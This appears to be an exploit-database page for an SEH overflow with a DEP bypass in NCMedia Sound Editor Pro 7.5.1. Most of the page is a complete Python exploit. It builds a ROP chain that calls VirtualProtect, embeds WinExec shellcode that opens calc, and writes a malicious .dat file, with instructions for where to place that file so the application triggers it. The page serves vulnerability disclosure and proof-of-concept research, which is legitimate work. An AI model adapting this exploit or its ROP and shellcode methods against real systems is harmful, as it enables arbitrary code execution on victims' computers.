header-logo
Suggest Exploit
vendor:
Sound Editor Pro
by:
b33f
7.5
CVSS
HIGH
SEH Overflow
119
CWE
Product Name: Sound Editor Pro
Affected Version From: NCMedia Sound Editor Pro v7.5.1
Affected Version To: NCMedia Sound Editor Pro v7.5.1
Patch Exists: NO
Related CWE:
CPE: a:ncmedia:sound_editor_pro:7.5.1
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 Pro SP1 (32-bit)

NCMedia Sound Editor Pro v7.5.1 SEH&DEP

The exploit allows an attacker to execute arbitrary code on a remote system by exploiting a SEH overflow vulnerability in NCMedia Sound Editor Pro v7.5.1. By placing a specially crafted .dat file in the correct directory and opening it within the application, an attacker can trigger the vulnerability and gain control of the system. This exploit is based on a semi-universal ROP chain that utilizes the MSVCR70.dll library included with the software.

Mitigation:

The vendor has not provided a patch for this vulnerability. To mitigate the risk, it is recommended to refrain from opening untrusted .dat files or using the affected software.
Source

Exploit-DB raw data:

#!/usr/bin/python

#---------------------------------------------------------------------------#
# Exploit: NCMedia Sound Editor Pro v7.5.1 SEH&DEP                          #
# Author: b33f - http://www.fuzzysecurity.com/                              #
# OS: Windows 7 Pro SP1 (probably universal across 32-bit)                  #
# POC - Julien Ahrens XP SP3: http://www.exploit-db.com/exploits/21331/     #
# Software: http://www.soundeditorpro.com/                                  #
# HOWTO: put the *.dat file in [USER]\Roaming\Sound Editor Pro\             #
#        open -> click "File" menu -> calc ;))                              #
#---------------------------------------------------------------------------#
# Curiously enough, the only thing that went through the mind of the        #
# ROP-Chain as it was executed was "Oh no, not again"!                      #
#---------------------------------------------------------------------------#

import sys, socket, struct 

file="MRUList201202.dat"

#--------------------------------------------------------------------------------------------------------------#
# Semi-Universal ROP chain based entirely on MSVCR70.dll which comes packaged with "NCMedia Sound Editor"...   #
#--------------------------------------------------------------------------------------------------------------#
rop = struct.pack('<L',0x7c0126bc)  # XCHG EAX,EBP # ADD AL,7C # RETN                                           \
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                             |
rop += struct.pack('<L',0x7C0390FD) # VirtualProtect() -> ESI=0 EBP=0 -> 7c039138(VP)-3B                         | MOV VP -> ESI
rop += struct.pack('<L',0x7c023a4f) # ADD ESI,DWORD PTR DS:[EAX+EBP+3B] # RETN                                  /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                            \
rop += struct.pack('<L',0xFFBF90EF) # NEG is -> 0x00406f11 : jmp esp [SoundEditorPro.exe]                        | JMP ESP -> EBP
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN [MSVCR70.dll]                                               |
rop += struct.pack('<L',0x7c0126b7) # XCHG EAX,EBP # ADD AL,7C # RETN                                           /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                            \
rop += struct.pack('<L',0xFFFFFDFF) # Neg is 201-HEX (513-bytes)                                                 | Executable Size -> EBX
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN                                                             |
rop += struct.pack('<L',0x7c01561c) # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN                                /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c026484) # POP EDI # RETN                                                            \  ROP-NOP -> EDI
rop += struct.pack('<L',0x7c034e02) # ROP-NOP                                                                   /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                            \
rop += struct.pack('<L',0xFFFFFFC0) # NEG is 0x40                                                                | newProtect -> EDX
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN                                                             |
rop += struct.pack('<L',0x7c026dc4) # MOV EDX,EAX # INC ECX # MOVZX EAX,BYTE PTR DS:[ECX] # ADD EAX,EDX # RETN  /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c034e01) # POP ECX # RETN                                                            \  RW lpOldProtect -> ECX
rop += struct.pack('<L',0x7c049001) # lpOldProtect                                                              /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                            \  NOP padding -> EAX
rop += struct.pack('<L',0x90909090) # NOP                                                                       /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0126b6) # PUSHAD # XCHG EAX,EBP # ADD AL,7C # RETN                                  |  PUSHAD -> pwnd!!
#--------------------------------------------------------------------------------------------------------------#

#----------------------------------
# Greets to SkyLined, you do great work with shellcode!!
#----------------------------------
calc = (
"\x31\xD2"                      #
"\x52"                          #
"\x68\x63\x61\x6C\x63"          # Stack has arguments for
"\x89\xE6"                      # WinExec -> calc
"\x52"                          #
"\x56"                          ########
"\x64\x8B\x72\x30"              #
"\x8B\x76\x0C"                  #
"\x8B\x76\x0C"                  # Found Kernel32
"\xAD"                          # base address
"\x8B\x30"                      #
"\x8B\x7E\x18"                  ########
"\x8B\x5F\x3C"                  # Found export table offset
"\x8B\x5C\x1F\x78"              ########
"\x8B\x74\x1F\x20"              # Found export names table
"\x01\xFE"                      ########
"\x8B\x4C\x1F\x24"              # Found export ordinals table
"\x01\xF9"                      ########
"\x42"                          #
"\xAD"                          # Found WinExec ordinal
"\x81\x3C\x07\x57\x69\x6E\x45"  #
"\x75\xF5"                      ########
"\x0F\xB7\x54\x51\xFE"          #
"\x8B\x74\x1F\x1C"              #
"\x01\xFE"                      # Pop calc ;))
"\x03\x3C\x96"                  #
"\xFF\xD7")                     #

#----------------------------------
# badchars -> '\x00\x0d\x0a'
# 0x0040e02a {pivot 1092}  # ADD ESP,444 # RETN [SoundEditorPro.exe]
# ROP-NOP Slide 0x7c034e02 [MSVCR70.dll]
#----------------------------------
b00m = "\x90"*10 + calc
poc = "\x02\x4E\x03\x7C"*61 + rop + b00m + "\x41"*(3880-len(rop + b00m)) + "\x2A\xE0\x40\x00"

try:
    print "[*] Creating exploit file...\n"
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!"
except:
    print "[!] Error while creating file!"

Navigation

Suggest Exploit

Services By CQR